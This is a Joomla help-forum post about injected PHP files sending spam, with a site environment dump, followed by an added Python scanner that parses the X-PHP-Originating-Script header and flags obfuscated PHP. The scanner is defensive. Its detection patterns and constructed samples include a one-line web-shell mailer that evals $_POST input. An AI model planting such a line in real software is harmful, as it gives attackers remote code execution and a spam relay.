One day I received a spam abuse notification from my server. I couldn't identify the file or script that was sending the emails until I activated a header for spam abuse that indicates the file or path that is sending it. When I identified the file (attachments), it's an encrypted PHP (I think) that is sending email (I think).
It all started on July 4th 2015; on this date I received the first abuse notification. It seems the hacker (or robot) uploaded the PHP file with the script. In the sendmail log, I identified this:
In that path, I found the 2 files attached to this post. The first time, I detected the ini.php file and erased it, I deleted a lot of unused plugins and everything was working fine... until I received another abuse notification with the second PHP file (inc.php) uploaded in a different location.
PHP file injection?
I already followed all the security steps (I think) and I ran the FPA:
Forum Post Assistant (v1.2.4) : 25th August 2015

Problem Description :: Injection of PHP file sending spam emails
Log/Error Message :: spam abuse
Actions Taken To Resolve ::
- Changed all passwords
- Update Joomla
- Delete extensions
- Verify current extensions
- Verify folders permission
Any help? Thank you!

Basic Environment ::
Joomla! Instance :: Joomla! 3.4.3-Stable (Ember) 2-July-2015
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: nenasric (uid: 1/gid: 1) | Group: nenasric (gid: 1) | Valid For: 3.4
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.32-042stab088.4 | Technology: x86_64 | Web Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 | Encoding: gzip, deflate | Doc Root: /home/nenasric/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.4.29 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 24567 | Log Errors To: error_log | Last Known Error: 25th August 2015 21:40:42. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 250M | Max. POST Size: 500M | Max. Input Time: 1000 | Max. Execution Time: 120 | Memory Limit: 128M
MySQL Configuration :: Version: 5.5.42-cll (Client:5.5.42) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 9.43 MiB | #of Tables: 133

Detailed Environment ::
PHP Extensions :: Core (5.4.29) | date (5.4.29) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | SPL (0.2) | json (1.2.1) | mbstring () | mcrypt () | session () | mysql (1.0) | mysqli (0.1) | standard (5.4.29) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | SimpleXML (0.1) | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.11.0) | cgi-fcgi () | XCache (3.0.3) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | pdo_mysql (1.0.2) | XCache Cacher (3.0.3) | ionCube Loader () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No

Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) ::

Database Information ::
Database _FPA_STATS :: Uptime: 1855113 | Threads: 4 | Questions: 20047691 | Slow queries: 461 | Opens: 316070 | Flush tables: 1 | Open tables: 2047 | Queries per second avg: 10.806 |

Extensions Discovered ::
Components :: SITE :: com_wrapper (3.0.0) | com_mailto (3.0.0) |
Components :: ADMIN :: com_checkin (3.0.0) | Spider Video Player (2.8.5) | com_menus (3.0.0) | com_users (3.0.0) | joautotwitter (3.2) | com_admin (3.0.0) | com_postinstall (3.2.0) | com_ajax (3.2.0) | com_messages (3.0.0) | com_redirect (3.0.0) | com_content (3.0.0) | com_login (3.0.0) | com_banners (3.0.0) | com_modules (3.0.0) | com_newsfeeds (3.0.0) | com_tags (3.1.0) | com_joomlaupdate (3.0.0) | com_phocagallery (4.1.2) | com_tagmeta (1.7.2) | com_finder (3.0.0) | com_contenthistory (3.2.0) | offlajn_installer (1.0) | com_templates (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_cpanel (3.0.0) | com_categories (3.0.0) | FW Gallery (2.3.2) | com_cache (3.0.0) | com_config (3.0.0) | com_media (3.0.0) | com_languages (3.0.0) | com_plugins (3.0.0) |
Modules :: SITE :: mod_login (3.0.0) | mod_random_image (3.0.0) | mod_footer (3.0.0) | mod_breadcrumbs (3.0.0) | Spider Video Player Module (2.8.5) | mod_custom (3.0.0) | mod_articles_category (3.0.0) | mod_languages (3.0.0) | mod_search (3.0.0) | mod_feed (3.0.0) | mod_articles_popular (3.0.0) | mod_articles_categories (3.0.0) | mod_users_latest (3.0.0) | mod_tags_similar (3.1.0) | mod_stats (3.0.0) | mod_articles_archive (3.0.0) | mod_articles_news (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_related_items (3.0.0) | mod_tags_popular (3.1.0) | mod_syndicate (3.0.0) | mod_banners (3.0.0) | Flexi Custom Code (1.3) | mod_articles_latest (3.0.0) | mod_wrapper (3.0.0) |
Modules :: ADMIN :: mod_login (3.0.0) | mod_popular (3.0.0) | mod_version (3.0.0) | mod_custom (3.0.0) | mod_feed (3.0.0) | mod_stats_admin (3.0.0) | mod_toolbar (3.0.0) | mod_latest (3.0.0) | mod_status (3.0.0) | mod_title (3.0.0) | mod_logged (3.0.0) | mod_menu (3.0.0) | mod_submenu (3.0.0) | mod_multilangstatus (3.0.0) | mod_quickicon (3.0.0) |
Plugins :: SITE :: plg_finder_categories (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_content (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_tags (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_phocagallery (4.1.2) | plg_system_redirect (3.0.0) | plg_system_cache (3.0.0) | PLG_SYSTEM_HEADERTAGS (3.1.9) | plg_system_log (3.0.0) | plg_system_languagecode (3.0.0) | System - JO Auto Post Twitter (3.1) | plg_system_p3p (3.0.0) | Offlajn Joomla 3.0 compatibili (1.0) | System - Marco's SQL Injection (1.4) | plg_system_logout (3.0.0) | Offlajn Dojo Loader (1.0) | plg_system_tagmeta (1.7.2) | System - Offlajn Params (1.0.0) | plg_system_debug (3.0.0) | plg_system_sef (3.0.0) | plg_system_highlight (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagefilter (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_cookie (3.0.0) | plg_authentication_ldap (3.0.0) | FW Gallery - Batch Upload (1.3.0) | plg_user_contactcreator (3.0.0) | plg_user_joomla (3.0.0) | plg_user_profile (3.0.0) | plg_captcha_recaptcha (3.4.0) | plg_quickicon_extensionupdate (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagebreak (3.0.0) | plg_content_vote (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | Content - Load Spider Video Pl (2.8.5) | plg_content_pagenavigation (3.0.0) | plg_content_phocagallery (4.1.2) | plg_search_categories (3.0.0) | plg_search_contacts (3.0.0) | plg_search_content (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_tags (3.0.0) | plg_editors_codemirror (5.3) | plg_editors_tinymce (4.1.7) | plg_extension_joomla (3.0.0) | plg_twofactorauth_yubikey (3.2.0) | plg_twofactorauth_totp (3.2.0) | plg_installer_webinstaller (1.0.5) |

Templates Discovered ::
Templates :: SITE :: protostar (1.0) | beez3 (3.1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |
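The post traces the spam to a script through a mail header that names the sending file, and then hunts for the dropped PHP files (ini.php, inc.php). The header in question is, by all appearances, the X-PHP-Originating-Script header PHP adds when mail.add_x_header is enabled, which carries the uid and the basename of the script that called mail(); the basename alone does not give the directory, so a scan of the webroot is still needed. The Python below is an added example, not code from the original post or from Joomla: it parses that header from a constructed abuse sample and walks a constructed webroot looking for PHP files that trip common obfuscation indicators. The file names, paths and contents are made up for illustration, and the indicator list is a heuristic that points at files to inspect, not proof of compromise.

```python
"""Hunt for an injected PHP mailer.

Added example (not code from the original post): reads PHP's
X-PHP-Originating-Script header, written when mail.add_x_header=On, and scans a
webroot for PHP files showing common obfuscation indicators. All sample data
below is constructed for illustration.
"""
import email
import os
import re
import tempfile
from email import policy

# Heuristic indicators; several together point to a dropped mailer/backdoor,
# a single one is normal in legitimate code (e.g. one base64_decode call).
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "gzinflate/gzuncompress": re.compile(r"\bgz(?:inflate|uncompress)\s*\(", re.I),
    "str_rot13": re.compile(r"\bstr_rot13\s*\(", re.I),
    "preg_replace /e": re.compile(r"""preg_replace\s*\(\s*(["'])/.*?/[a-zA-Z]*e[a-zA-Z]*\1"""),
    "mail() call": re.compile(r"\bmail\s*\(", re.I),
    # Request data fed straight into an execution sink: strong on its own.
    "eval of request input": re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b",
        re.I),
}
STRONG = {"eval of request input"}


def originating_script(raw_message):
    """Return (uid, script basename) from X-PHP-Originating-Script, or None.

    PHP writes the header as "<uid>:<basename of the script>" when
    mail.add_x_header is enabled; the uid is the account the script ran as.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    value = msg.get("X-PHP-Originating-Script")
    if not value:
        return None
    uid, _, script = value.strip().partition(":")
    return (int(uid) if uid.isdigit() else None, script)


def scan_php(root, min_hits=2):
    """Walk root and return sorted (relative path, [indicators]) for PHP files
    that trip at least min_hits indicators or any strong indicator."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            hits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(src))
            if len(hits) >= min_hits or STRONG & set(hits):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, hits))
    return sorted(findings)


# Constructed abuse sample: only the header line matters to originating_script().
SAMPLE_ABUSE_MAIL = """\
Received: from localhost (localhost [127.0.0.1])
X-PHP-Originating-Script: 1001:inc.php
From: noreply@example.com
To: victim@example.com
Subject: hello

buy now
"""

# Constructed webroot: the two "dropped" files are inert stand-ins shaped like
# the ini.php / inc.php the post describes, not real malware.
SAMPLE_FILES = {
    "index.php": "<?php define('_JEXEC', 1); require_once 'includes/app.php';\n",
    "templates/beez3/helper.php": "<?php echo base64_decode('aGVsbG8=');\n",
    "plugins/system/ini.php": "<?php $x=base64_decode('ZWNobyAxOw=='); eval(gzinflate($x));\n",
    "images/inc.php": "<?php @eval($_POST['c']); mail($_POST['t'],$_POST['s'],$_POST['b']);\n",
}


def make_sample_webroot():
    """Write SAMPLE_FILES under a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    print("mail sent by:", originating_script(SAMPLE_ABUSE_MAIL))
    for rel, hits in scan_php(make_sample_webroot()):
        print(f"{rel}: {', '.join(hits)}")
```

On a real host, point scan_php() at the document root (here /home/nenasric/public_html) and review every flagged file by hand; a single base64_decode in a template helper is normal, while eval fed from $_POST is not. PHP's mail.log directive (a php.ini setting, separate from mail.add_x_header) records the full path and line of each mail() call, which removes the guesswork the basename-only header leaves.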